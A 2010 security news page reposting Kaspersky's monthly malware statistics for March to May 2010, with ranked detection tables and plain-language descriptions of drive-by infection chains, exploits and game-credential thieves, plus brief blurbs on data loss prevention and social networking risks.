News
Kaspersky Monthly Malware Statistics: May 2010 (made possible by Kaspersky Labs)
Thu, 08/07/2010 - 10:00
Malicious programs detected on users’ computers
The first Top Twenty list immediately below shows malware, adware and potentially unwanted programs that were detected and neutralized by the on-access scanner when they were accessed for the first time.
| Position | Change in position | Name | Number of infected computers |
| 1 |  0 |
Net-Worm.Win32.Kido.ir | 339585 |
| 2 | 0 |
Virus.Win32.Sality.aa | 210257 |
| 3 | 0 |
Net-Worm.Win32.Kido.ih | 201746 |
| 4 | 0 |
Net-Worm.Win32.Kido.iq | 169017 |
| 5 |  9 |
Trojan.JS.Agent.bhr | 161414 |
| 6 |  -1 |
Worm.Win32.FlyStudio.cu | 127835 |
| 7 | -1 |
Virus.Win32.Virut.ce | 70189 |
| 8 | 0 |
Trojan-Downloader.Win32.VB.eql | 66486 |
| 9 | 0 |
Worm.Win32.Mabezat.b | 54866 |
| 10 | 0 |
Trojan-Dropper.Win32.Flystud.yo | 50490 |
| 11 | 0 |
Worm.Win32.AutoIt.tc | 47044 |
| 12 | 1 |
Packed.Win32.Krap.l | 44056 |
| 13 |  New |
Trojan.JS.Iframe.lq | 38658 |
| 14 | New |
Trojan.Win32.Agent2.cqzi | 35423 |
| 15 | 1 |
Trojan.Win32.Autoit.ci | 34670 |
| 16 | New |
Trojan-GameThief.Win32.Magania.dbtv | 31066 |
| 17 | New |
Trojan-Downloader.Win32.Geral.cnh | 30225 |
| 18 | New |
Trojan.JS.Zapchast.dv | 29592 |
| 19 | -2 |
Virus.Win32.Induc.a | 28522 |
| 20 | -8 |
Exploit.JS.CVE-2010-0806.e | 27606 |
During May there were five new entries to the list.
Variants of the CVE-2010-0806 exploit left the Top 20 list as swiftly as they had joined it a month ago. However, malware writers are nowhere near through with exploiting the CVE-2010-0806 vulnerability. In May, Trojan.JS.Agent.bhr, a component of one of the CVE-2010-0806 exploit versions, moved up nine places to take up 5th position. The newcomer, Trojan.JS.Iframe.lq (13th place) is nothing but an intermediate link of a drive-by attack: it is used to redirect the user to Exploit.JS.CVE-2010-0806.i. Another piece of malware with a direct relationship to the CVE-2010-0806 vulnerability is Trojan.JS.Zapchast.dv. This Trojan is part of Exploit.JS.CVE-2010-0806.e which is currently in 20th place.
Trojan-GameThief.Win32.Magania.dbtv in 16th place lends support to the assumption that we made around a month ago concerning the purpose of the above exploits. Malware writers mainly use them to steal online gaming identities. This particular credential thief has impacted players of CabalOnline, Metin2, Mu Online and various games developed by Nexon.net.
The general scheme of infection is as follows:
- The user first visits a website contaminated by Trojan.JS.Iframe.lq, Trojan.JS.Zapchast.dv or either of the two versions of the CVE-2010-0806 exploit.
- The exploit then downloads Trojan-Downloader.Win32.Geral.cnh. This is a Trojan downloader that packs a pretty massive payload. Its malicious arsenal includes: two rootkits to help it hide from any security software; the Worm.Win32.Autorun component to ensure that the Trojan can propagate via detachable memory devices, and a download algorithm to allow the cybercriminals to use to-download lists.
- The Geral component downloads various versions of Trojan-PSW.Win32.QQPass, Trojan-GameTheif.Win32.OnlineGames/WOW/Magania, including Trojan-GameThief.Win32.Magania.dbtv, to the victim computer.
Malicious programs on the Internet
The second Top Twenty list below shows data generated by the web antivirus component and reflects the online threat landscape. This table includes malware detected on web pages and malware downloaded to victim machines from web pages.
| Position | Change in position | Name | Number of attempted downloads |
| 1 | New |
Trojan-Clicker.JS.Iframe.bb | 397667 |
| 2 | New |
Exploit.Java.CVE-2010-0886.a | 244126 |
| 3 | New |
Trojan.JS.Redirector.cq | 194285 |
| 4 | New |
Exploit.Java.Agent.f | 108869 |
| 5 | New |
Trojan.JS.Agent.bhr | 107202 |
| 6 | New |
Exploit.Java.CVE-2009-3867.d | 85120 |
| 7 | -2 |
not-a-virus:AdWare.Win32.FunWeb.q | 82309 |
| 8 | -6 |
Exploit.JS.CVE-2010-0806.i | 79192 |
| 9 | -5 |
Exploit.JS.CVE-2010-0806.b | 76093 |
| 10 | New |
Trojan.JS.Zapchast.dv | 73442 |
| 11 | -2 |
Trojan-Clicker.JS.Agent.ma | 68033 |
| 12 | New |
Trojan.JS.Iframe.lq | 59109 |
| 13 | New |
Trojan-Downloader.JS.Agent.fig | 56820 |
| 14 | 5 |
not-a-virus:AdWare.Win32.Shopper.l | 50497 |
| 15 | 2 |
Exploit.JS.CVE-2010-0806.e | 50442 |
| 16 | -4 |
Trojan.JS.Redirector.l | 50043 |
| 17 | New |
Trojan.JS.Redirector.cj | 47179 |
| 18 | -2 |
not-a-virus:AdWare.Win32.Boran.z | 43514 |
| 19 | -6 |
Trojan-Dropper.Win32.VB.amlh | 43366 |
| 20 | New |
Exploit.JS.Pdfka.chw | 42362 |
All of the malicious programs listed above have seen changes to their positions.
First place is occupied by Trojan-Clicker.JS.Iframe.bb, which infected almost 400,000 websites during May alone. This Trojan aims to increase website hit counts by making the victim computers visit them without the users’ knowledge or consent.
The new Trojan.JS.Redirector.cq (in 3rd place) redirects visitors to websites distributing rogue antivirus programs.
Seven malicious programs in the Top 20 are exploits. It is remarkable that three newcomers, namely Exploit.Java.CVE-2010-0886.a, Exploit.Java.Agent.f, and Exploit.Java.CVE-2009-3867.d are exploits for the Java platform.
One of them is Exploit.Java.CVE-2010-0886.a which ended up in 2nd place. This malicious program consists of two parts: a downloader written in JavaScript and a Java applet. The downloader uses the launch function from the Java Development Toolkit. This function uses as a parameter a string composed of several parameter keys and the URL where the malicious Java applet is located. The JavaScript code surreptitiously initiates execution of a Java program on the victim computer which in most cases is a Trojan downloader. The downloader in its turn downloads a malicious executable file and launches it on the victim computer. Interestingly, CVE-2010-0886.a gained much of its popularity because it used the Pegel downloader for one of its attacks. A description of Pegel is given in our February statistics overview.
The second newcomer, Exploit.Java.CVE-2009-3867.d is in 6th place. This exploit uses the stack overflow technique by calling the function getSoundBank. This function is used to download media content and expects to get the URL of a soundbank object as its parameter. This vulnerability enables the cybercriminals to use a shell code with which they can then run any code they want to on the victim computer.
The above exploits are typically associated with redirectors and legitimate, but infected, websites. The list of such ‘companion’ malware in May includes Trojan.JS.Agent.bhr (in 5th place), Trojan.JS.Zapchast.dv (in 10th place), Trojan.JS.Iframe.lq (in 12th place) and Trojan-Downloader.JS.Agent.fig (in 13th place).
Countries launching the most web-borne infections:
Conclusion
In recent months cybercriminals have actively used exploits in order to steal users’ confidential data. Changes have been affecting malware propagation techniques and methods that prevent the analysis and detection of malware.
Eleven of May’s Top 20 malicious programs from the Internet are different exploits and their related Trojans. These malicious programs occupy five consecutive Top 20 places starting from 2nd place and then appear on the list in groups of two or three variants.
It is also worth noting that users of Sun software are strongly advised to check for software updates on a regular basis. This advice is given as there is a lot of malware around exploiting the vulnerabilities in the Java platform.
Kaspersky Monthly Malware Statistics: April 2010 (made possible by Kaspersky Labs)
Thu, 24/06/2010 - 15:51
Malicious programs detected on users’ computers
The first Top Twenty lists malicious programs, adware and potentially unwanted programs that were detected and neutralized when accessed for the first time, i.e. by the on-access scanner.
| Position | Change in position | Name | Number of infected computers |
| 1 | 0 |
Net-Worm.Win32.Kido.ir | 330025 |
| 2 | 0 |
Virus.Win32.Sality.aa | 208219 |
| 3 | 0 |
Net-Worm.Win32.Kido.ih | 183527 |
| 4 | 0 |
Net-Worm.Win32.Kido.iq | 172517 |
| 5 | 0 |
Worm.Win32.FlyStudio.cu | 125714 |
| 6 | 2 |
Virus.Win32.Virut.ce | 70307 |
| 7 | New |
Exploit.JS.CVE-2010-0806.i | 68172 |
| 8 | -2 |
Trojan-Downloader.Win32.VB.eql | 64753 |
| 9 | 2 |
Worm.Win32.Mabezat.b | 51863 |
| 10 | 5 |
Trojan-Dropper.Win32.Flystud.yo | 50847 |
| 11 | -1 |
Worm.Win32.AutoIt.tc | 49622 |
| 12 | New |
Exploit.JS.CVE-2010-0806.e | 45070 |
| 13 | -4 |
Packed.Win32.Krap.l | 44942 |
| 14 | New |
Trojan.JS.Agent.bhr | 36795 |
| 15 | 2 |
not-a-virus:AdWare.Win32.RK.aw | 36408 |
| 16 |  Return |
Trojan.Win32.Autoit.ci | 35877 |
| 17 | -1 |
Virus.Win32.Induc.a | 31846 |
| 18 | New |
Trojan.JS.Zapchast.dj | 30167 |
| 19 | Return |
Packed.Win32.Black.a | 29910 |
| 20 | Return |
Worm.Win32.AutoRun.dui | 28343 |
The list of the twenty most frequently occurring malicious programs detected on users’ computers traditionally remains fairly stable, so it comes as no surprise that Kido and Sality continue to occupy the top two places.
April saw four new entries. Two of them (7th and 12th places) are variants of the CVE-2010-0806 exploit which we mentioned last month, while the other two (14th and 18th places) are Trojans that turned out to be directly connected to the CVE-2010-0806 exploit. The exploit itself is usually encrypted or obfuscated and broken up into several parts. When an infected page is opened in the browser, the component parts of the exploit download in a particular order. The part of the code to be downloaded last is the part that unpacks and launches the exploit. The two new Trojans in this ratings list are components of one of the CVE-2010-0806 exploit variants.
To recap, the exploit is for a vulnerability that was detected in Internet Explorer back in March. Since then, it has been actively used by cybercriminals who spotted a description of it that went into rather too much detail. In March the number of unique downloads of the CVE-2010-0806 exploit had already reached the 200,000 mark. In April two variants of the exploit were neutralized on more than 110,000 computers. We’ll discuss the rapid rise of the CVE-2010-0806 exploit in more detail below.
It’s also worth mentioning Virut.ce’s slow but steady rise towards the top five. Over the past three months it has climbed from 10th place to 6th and in April alone was neutralized on more than 70,000 computers.
Malicious programs on the Internet
The second Top Twenty presents data generated by the web antivirus component, and reflects the online threat landscape. This ranking includes malicious programs detected on web pages and malware downloaded to victim machines from web pages.
| Position | Change in position | Name | Number of attempted downloads |
| 1 | 1 |
Exploit.JS.CVE-2010-0806.i | 201152 |
| 2 | New |
Exploit.JS.Pdfka.cab | 117529 |
| 3 | 7 |
Exploit.JS.CVE-2010-0806.b | 110665 |
| 4 | New |
not-a-virus:AdWare.Win32.FunWeb.q | 99628 |
| 5 | New |
Trojan-Downloader.JS.Twetti.с | 89596 |
| 6 | New |
Trojan-Downloader.JS.Iframe.bup | 85973 |
| 7 | New |
Trojan.JS.Agent.bhl | 76648 |
| 8 | Return |
Trojan-Clicker.JS.Agent.ma | 76415 |
| 9 | New |
Trojan-Clicker.JS.Iframe.ev | 74324 |
| 10 | New |
Exploit.JS.Pdfka.byp | 69606 |
| 11 | -8 |
Trojan.JS.Redirector.l | 68361 |
| 12 | New |
Trojan-Dropper.Win32.VB.amlh | 60318 |
| 13 | New |
Exploit.JS.Pdfka.byq | 60184 |
| 14 | -10 |
Trojan-Clicker.JS.Iframe.ea | 57922 |
| 15 | -8 |
not-a-virus:AdWare.Win32.Boran.z | 56660 |
| 16 | New |
Exploit.JS.CVE-2010-0806.e | 53989 |
| 17 | -11 |
Trojan.JS.Agent.aui | 52703 |
| 18 | 0 |
not-a-virus:AdWare.Win32.Shopper.l | 50252 |
| 19 | New |
Packed.Win32.Krap.gy | 46489 |
| 20 | New |
Trojan.HTML.Fraud.am | 42592 |
In contrast to our first Top Twenty, this rating is far more volatile. The leader for the last two months running, Gumblar.x, is nowhere to be seen in the April Top Twenty after its activity fell off sharply. Like previous Gumblar epidemics, this one exploded onto the scene, peaked in February when over 450,000 websites were infected by Gumblar, and disappeared just as quickly as it came two months later. This should act as a warning sign, because this is typical of Gumblar.x’s behavior and is reminiscent of events back in February. It remains to be seen when the next epidemic will strike, or if there will even be one, but we’ll be keeping an eye on developments.
The rapid spread of the CVE-2010-0806 exploit this month means it claimed top spot in our second rating. The exploit usually imports small downloader programs such as members of the Trojan-Downloader.Win32.Small, Trojan-Dropper.Win32.Agent, Trojan.Win32.Inject, and Trojan.Win32.Sasfis families to victims’ computers. These Trojans then download other malicious programs to the infected machines – usually various modifications of Trojan-GameTheif.Win32.Magania, Trojan-GameTheif.Win32.WOW and Backdoor.Win32.Torr. It looks as if the main aim for cybercriminals using the CVE-2010-0806 exploit during April was the theft of confidential data from users with accounts for popular online games. The total amount of attempted downloads of the three exploit variants in 1st, 3rd and 16th places exceeded 350,000 in all.
Among the newcomers in April were three exploits (2nd, 10th, and 13th places) that target vulnerabilities in Adobe Reader and Acrobat. The vulnerabilities that these three PDF exploits use are relatively old and were detected back in 2009. The exploits themselves are PDF documents containing scenarios in JavaScript. These scripts then seek out various Trojan-Downloaders on the Internet which they install and then these in turn download and run lots of other malicious programs. The malware downloaded to computers infected by Pdfka.cab (2nd place) included variants of the PSWTool.Win32.MailPassView family. The programs from this group are used to steal logins and passwords for email accounts.
Packed.Win32.Krap.gy in 19th place, like most of the representatives from that family of packers, conceals rogue antivirus programs. One of the sources behind the spread of these fake security programs is an HTML page detected by Kaspersky Lab as Trojan.HTML.Fraud.am (20th place).
The number of attempted downloads of Twetti.c (5th place) totaled 90,000. The functionality of this Trojan is no different from its less obfuscated predecessor Twetti.a, which we mentioned in December.
Looking at April’s ratings, one of the main trends of recent months is clearly visible: cybercriminals are making active use of exploits whose source codes are widely available. In the vast majority of cases, the target of such attacks is confidential data. The cybercriminals try to gain access to email and online gaming services’ accounts along with various websites. These types of attempts numbered hundreds of thousands in April. The stolen data may well be sold and/or used for spreading malicious programs.
Countries launching the most web-borne infections:
ROI of Data Loss Prevention
Mon, 03/05/2010 - 17:40Introduction
One data loss incident can result in continuous cost. After making affected customers whole, conducting an internal investigation, repairing any damage to internal systems, and dealing with expected litigation, you can count on external audits, increased regulatory oversight, and a damaged reputation to stay with you for a while.
Organizations that rely on intellectual property (IP) for sale and use are subject to more long-term and far-reaching costs when data is lost. IP is the heart of today’s technology, manufacturing, pharmaceutical, and even financial firms, and their most coveted sustainable advantage. When lost, it can have a direct and immediate impact on both the R&D costs, and the revenue estimates for the full lifecycle of the asset.
Without question, a data leak is not a one-time cost. Even after your operations have recovered, effects of the data loss could continue to impact your business for a decade or longer. One mistake can have far-reaching consequences, and a serious leak may mean that your business never recovers—or at least never returns to “normal.”
Fortunately, the threat of a leak is significantly mitigated through the use of technology—specifically, a data loss prevention solution, which can provide a clear return on investment (ROI) and a manageable total cost of ownership. Data loss prevention provides a sound cost-avoidance strategy and can positively impact revenue—saving hundreds of millions of dollars with little upfront investment. The risk of business as usual is clear, as is the reward for implementing diligent data control and data loss prevention measures.
To read more about the ROI of DLP click here to download the whitepaper.
The Dangers of Social Networking
Mon, 03/05/2010 - 17:30Introduction
Social Networking is the one area of the Internet that nearly every computer-literate person indulges in these days. It doesn’t matter whether it’s your company boss, your neighbor, your boyfriend or your girlfriend, everybody’s contactable via at least one of the Social Networking portals. However, since these platforms attract so many people – most of whom are blissfully unaware of the need for online security – they also draw in the cybercriminals who are out to make a fast buck from the unwary users.
To read more about the Danger of Social Networking click here
Monthly Malware Statistics for March 2010 (made possible by Kaspersky Labs)
Mon, 19/04/2010 - 15:13
Monthly Malware Statistics: March 2010
Malicious programs detected on users’ computers
The first Top Twenty lists malicious programs, adware and potentially unwanted programs that were detected and neutralized when accessed for the first time, i.e. by the on-access scanner.
| Position | Change in position | Name | Number of infected computers |
| 1 | 0 |
Net-Worm.Win32.Kido.ir | 332833 |
| 2 | 0 |
Virus.Win32.Sality.aa | 211229 |
| 3 | 0 |
Net-Worm.Win32.Kido.ih | 186685 |
| 4 | 0 |
Net-Worm.Win32.Kido.iq | 181825 |
| 5 | 0 |
Worm.Win32.FlyStudio.cu | 121027 |
| 6 | 0 |
Trojan-Downloader.Win32.VB.eql | 68580 |
| 7 | New |
Trojan.Win32.AutoRun.abj | 66331 |
| 8 | 1 |
Virus.Win32.Virut.ce | 61003 |
| 9 | 1 |
Packed.Win32.Krap.l | 55823 |
| 10 | -2 |
Worm.Win32.AutoIt.tc | 55065 |
| 11 | 4 |
Worm.Win32.Mabezat.b | 49521 |
| 12 | -5 |
Exploit.JS.Aurora.a | 43776 |
| 13 | New |
Packed.Win32.Krap.as | 40912 |
| 14 | New |
Trojan.Win32.AutoRun.aay | 40754 |
| 15 | 3 |
Trojan-Dropper.Win32.Flystud.yo | 40190 |
| 16 | -4 |
Virus.Win32.Induc.a | 38683 |
| 17 | -4 |
not-a-virus:AdWare.Win32.RK.aw | 38547 |
| 18 | New |
Trojan.Win32.AutoRun.abd | 37037 |
| 19 | -5 |
not-a-virus:AdWare.Win32.Boran.z | 36996 |
| 20 | 0 |
not-a-virus:AdWare.Win32.FunWeb.q | 34177 |
There was no major change in the first Top Twenty leader board in March.
Three variants to the Autorun Trojan are worthy of mention. As was the case a couple of months back, they are autorun.inf files that use removable devices to spread the notorious P2P-Worm, Win32.Palevo and Trojan-GameThief.Win32.Magania.
This month’s rating once again has an entry displaying ‘packed’ characteristics, and this time it’s called Packed.Win32.Krap.as and conceals a rogue antivirus program. Currently this is in thirteenth place. In recent months the cybercriminals have demonstrated a penchant for specially designed packers of executable files. New methods of packing and concealing the true function of popular malware are being developed all the time, which explains why new variants of families such as Krap appear in our Top Twenty virtually every month.
Malicious programs on the Internet
The second Top Twenty presents data generated by the web antivirus component, and reflects the online threat landscape. This ranking includes malicious programs detected on web pages and malware downloaded to victim machines from web pages.
| Position | Change in position | Name | Number of attempted downloads |
| 1 | 0 |
Trojan-Downloader.JS.Gumblar.x | 178965 |
| 2 | New |
Exploit.JS.CVE-2010-0806.i | 148721 |
| 3 | -1 |
Trojan.JS.Redirector.l | 126277 |
| 4 | 2 |
Trojan-Clicker.JS.Iframe.ea | 102226 |
| 5 | 4 |
Exploit.JS.Aurora.a | 88196 |
| 6 | 4 |
Trojan.JS.Agent.aui | 80654 |
| 7 | -3 |
not-a-virus:AdWare.Win32.Boran.z | 75911 |
| 8 | New |
Trojan.HTML.Fraud.aj | 68809 |
| 9 | New |
Packed.Win32.Krap.as | 64329 |
| 10 | New |
Exploit.JS.CVE-2010-0806.b | 50763 |
| 11 | New |
Trojan.JS.FakeUpdate.ab | 49412 |
| 12 | New |
Trojan.HTML.Fraud.aq | 48927 |
| 13 | 3 |
Packed.Win32.Krap.ai | 47601 |
| 14 | Return |
Trojan-Downloader.JS.Twetti.a | 46858 |
| 15 | New |
Exploit.JS.Pdfka.bub | 45762 |
| 16 | New |
Trojan-Downloader.JS.Iframe.byo | 44848 |
| 17 | New |
Trojan.JS.FakeUpdate.aa | 42352 |
| 18 | Return |
not-a-virus:AdWare.Win32.Shopper.l | 41888 |
| 19 | New |
Trojan-Clicker.HTML.IFrame.fh | 38266 |
| 20 | New |
Packed.Win32.Krap.ao | 36123 |
As usual, when it comes to rating malicious programs on the Internet, there was plenty to discuss.
Let’s start with the latest Internet Explorer vulnerability CVE-2010-0806. A rather detailed description of the problem led to the exploit for it becoming extremely widespread. Now only the laziest of cybercriminals haven’t hopped on the bandwagon and two variants are already in our second Top Twenty – Exploit.JS.CVE-2010-0806.i (in second place) and Exploit.JS.CVE-2010-0806.b (in tenth place).
The latest Gumblar epidemic is still in full swing. As well as the older version of this script Trojan-Downloader, which shows up as Gumblar.x and occupies first place, a new updated version has appeared which is detected as HEUR:Trojan-Downloader.Script.Generic.
The Aurora.a exploit, which we wrote about last month, is still being used extensively by cybercriminals and has risen from ninth to fifth place in our rating.
The rather curious Twetti.a downloader, which we wrote about back in December, reared its none-too-pleasant head again in March, coming in at fourteenth place after a two-month hiatus. As was the case with Gumblar, it appears the black hats took some time-out and then started using this piece of malware to infect large numbers of websites again.
It’s also no coincidence that Exploit.JS.Pdfka.bub finds itself in fifteenth place – this malicious PDF file is a component in drive-by attacks that use Twetti.a to get a foot in the door.
Our second rating also includes four new entries – Trojan.HTML.Fraud.aj, Trojan.JS.FakeUpdate.ab, Trojan.HTML.Fraud.aq and Trojan.JS.FakeUpdate.aa – that distribute fake antivirus solutions and ransomware.
Countries launching the most web-borne infections:
The overall picture remains pretty much unchanged: attacks on users are predominantly Internet-borne and make use of the vulnerabilities that regularly appear in some of the most popular software products. Fortunately, these vulnerabilities are quickly patched by the vendors, but still, too many users fail to install these patches in time. Malware is also increasingly taking advantage of user gullibility and naivety. The most common malware of this kind used by the cybercriminals in March included rogue antivirus solutions and ransomware.
Copyright © 2010 Nclose cc.